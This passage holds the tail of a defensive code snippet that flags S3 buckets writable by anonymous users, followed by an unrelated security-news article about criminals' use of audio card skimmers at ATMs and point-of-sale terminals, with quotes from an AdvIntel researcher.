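    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"}]}
```

Any non-empty result from either function means the bucket's scripts can be rewritten by an anonymous caller, which is the misconfiguration Klijnsma describes; public `s3:GetObject` alone is not flagged.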

Cybercriminals Preferring Audio Skimmers Over Flash Skimmers

There has been a rapid increase in web skimming attacks alongside advances in technology; this has also fueled heavy activity in the black market for physical card skimming tools.
Web skimming attacks are designed to capture critical financial data and card details such as the cardholder's name and card numbers. In their physical counterpart, attackers attach a spying device to a point-of-sale (PoS) system or an ATM to gain access to the data these machines process from credit and debit cards.
The ever-evolving methods of skimming are one reason it thrives and remains undetected. Professional skimmers have formed closed communities that coordinate during skimming operations and support the cashers, decoders, engineers, extractors, and vendors with whatever they need.
Advanced Intelligence, a New York-based fraud prevention company, reported that the usual targets are gas stations, ATMs and PoS terminals. Skimming involves unauthorized access to sensitive financial information, and the cybercriminals rely mainly on upgrades and advances in technology to produce and circulate products that are hard to defeat and detect.
Another variant is the audio skimmer, which has been known to exist since 2010, although the underlying technique is said to date back to 1992. These devices capture the card data as audio, storing and encrypting it in MP3 format. The threat posed by audio skimmers multiplies when a camera is attached to capture the PIN, turning the device into a video skimmer as well.
Commenting on the matter, Yelisey Boguslavskiy, director of security research at AdvIntel, said, “They use timing-calculating algorithms to ‘read’ the audio when the card is being scanned by the ATM, which allows them to decode a track in 1-2 seconds and immediately convert it into text format.”
“Russian-speaking real carding communities have traditionally been exclusive and tight-lipped regarding their skimming operations. Skimming developers form exclusive trusted underground criminal networks, thereby connecting talented engineers, their trusted sellers, and wealthy carder buyers of such tools,” he added.